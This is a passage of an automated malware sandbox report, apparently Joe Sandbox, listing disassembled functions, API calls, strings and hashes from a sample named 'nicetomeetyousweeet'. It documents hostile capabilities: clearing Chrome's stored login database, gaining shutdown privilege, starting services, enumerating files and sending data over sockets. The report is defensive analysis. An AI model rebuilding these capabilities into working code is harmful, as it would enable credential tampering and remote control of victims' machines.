                                                                                • FindClose.KERNEL32(00000000), ref: 0078B77E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                • String ID:
                                                                                • API String ID: 1164774033-0
                                                                                • Opcode ID: 5b02bdbcf4a37e1aca2b174e4fdcca7b9d7d4ca2704527aaaf21edbe9df3a355
                                                                                • Instruction ID: 93c81a6ba184fd952fbc220cd1c8c7074534982b69d9be697fde0086ea9048ee
                                                                                • Opcode Fuzzy Hash: 5b02bdbcf4a37e1aca2b174e4fdcca7b9d7d4ca2704527aaaf21edbe9df3a355
                                                                                • Instruction Fuzzy Hash: 07513031E8421DDACB14FB64DC5EEED7738AF10311F5001AAF505A2193EF786A468B55
                                                                                Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                • API String ID: 2127411465-314212984
                                                                                • Opcode ID: 8ac1aed4fb6bb7190b52e800fd51920deabdfba7e9284d83d34130d77b492470
                                                                                • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                • Opcode Fuzzy Hash: 8ac1aed4fb6bb7190b52e800fd51920deabdfba7e9284d83d34130d77b492470
                                                                                • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                Function 00798ED0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 245fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00799126
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateFindFirst
                                                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                                                • API String ID: 41799849-3780268858
                                                                                • Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                                • Instruction ID: 41da2e593db445a5776d647dd302e61cf3eae61046465937790e284475c2bceb
                                                                                • Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                                • Instruction Fuzzy Hash: 1F817231688244DBC718FB24D89AEEF73A8AF90301F50492DF556871D3EF389A0AC752
                                                                                Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                • GetLastError.KERNEL32 ref: 0040B261
                                                                                Strings
                                                                                • UserProfile, xrefs: 0040B227
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                • API String ID: 2018770650-1062637481
                                                                                • Opcode ID: fe6db1cc6fbdad2e488c87e077bc3e1c5e33e4c4c5b80a897e564d9d6b6a8953
                                                                                • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                • Opcode Fuzzy Hash: fe6db1cc6fbdad2e488c87e077bc3e1c5e33e4c4c5b80a897e564d9d6b6a8953
                                                                                • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                • GetLastError.KERNEL32 ref: 00416B02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 3534403312-3733053543
                                                                                • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                Function 00452F00 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __floor_pentium4
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 4168288129-2761157908
                                                                                • Opcode ID: d8351365d2e61d61fcb96909c2723c4d7c28a1330773510c4eacdd77b9f22045
                                                                                • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                                                • Opcode Fuzzy Hash: d8351365d2e61d61fcb96909c2723c4d7c28a1330773510c4eacdd77b9f22045
                                                                                • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                                                Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                                                  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,006BB748,00000010), ref: 004042A5
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                • String ID:
                                                                                • API String ID: 4043647387-0
                                                                                • Opcode ID: 829ebf1a2af047e870534c2eb2b9cc5adf65d3368985490a84f5e4d66223815e
                                                                                • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                • Opcode Fuzzy Hash: 829ebf1a2af047e870534c2eb2b9cc5adf65d3368985490a84f5e4d66223815e
                                                                                • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                • String ID:
                                                                                • API String ID: 276877138-0
                                                                                • Opcode ID: 6ea9495a279f67546650a94d160ec3cc787ad22be2be4d82feb808d4313307b9
                                                                                • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                • Opcode Fuzzy Hash: 6ea9495a279f67546650a94d160ec3cc787ad22be2be4d82feb808d4313307b9
                                                                                • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                • API String ID: 1589313981-1420736420
                                                                                • Opcode ID: db1bf6a3f03ed615a470fd45861573a3767cda5ab0eafeb9ebd16c1861c1af19
                                                                                • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                • Opcode Fuzzy Hash: db1bf6a3f03ed615a470fd45861573a3767cda5ab0eafeb9ebd16c1861c1af19
                                                                                • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                • GetACP.KERNEL32 ref: 004512BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                Function 007D144A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 007D14E3
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 007D150C
                                                                                • GetACP.KERNEL32 ref: 007D1521
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                • Instruction ID: 90fbf9da6a75ed6c36c30d784230ae0ffd6d87b10c5deff4c9d716d48e2516eb
                                                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                • Instruction Fuzzy Hash: 9621CF22A00141B6D734CF54D900EA773B7EF94B61B968466E90ADB304FB3ADE81C390
                                                                                Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID: SETTINGS
                                                                                • API String ID: 3473537107-594951305
                                                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                Function 0078900E Relevance: 7.7, APIs: 5, Instructions: 216fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00789013
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 0078908B
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007890B4
                                                                                • FindClose.KERNEL32(?), ref: 007890CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
                                                                                • Opcode ID: cae9dc3e290e62eb3ac1bcabecde37f344aa65a3c2dada11a4f4a429893bb3a7
                                                                                • Instruction ID: 9fddc87e81c60a372cfe7541c13572271e5775d91bc732b53f2ff2c65bac5091
                                                                                • Opcode Fuzzy Hash: cae9dc3e290e62eb3ac1bcabecde37f344aa65a3c2dada11a4f4a429893bb3a7
                                                                                • Instruction Fuzzy Hash: 38815072940119DBCB15FBA4DC9AEED7378AF14310F14416AF506A7192EF38AF4ACB50
                                                                                Function 004513B7 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                • String ID:
                                                                                • API String ID: 745075371-0
                                                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                Function 007D161E Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C7185
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C7192
                                                                                • GetUserDefaultLCID.KERNEL32 ref: 007D172A
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 007D1785
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 007D1794
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 007D17DC
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 007D17FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                • String ID:
                                                                                • API String ID: 745075371-0
                                                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                • Instruction ID: 319577c8486180f3ad6a530a103d7eaedf8ae7dced01f704ee3f93e174b12bcc
                                                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                • Instruction Fuzzy Hash: 2351A271A00205BFDB20DFA4DC45ABE77B8AF04311F94057AF915EB2A1EB78DA40CB61
                                                                                Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
                                                                                • Opcode ID: ae3a8345bf63848518b9971a9f636b9d1b0a3643860abf23a656a537b8cd16c5
                                                                                • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                • Opcode Fuzzy Hash: ae3a8345bf63848518b9971a9f636b9d1b0a3643860abf23a656a537b8cd16c5
                                                                                • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                Function 00787CF3 Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00787CF8
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787DB1
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787DD5
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787EDD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
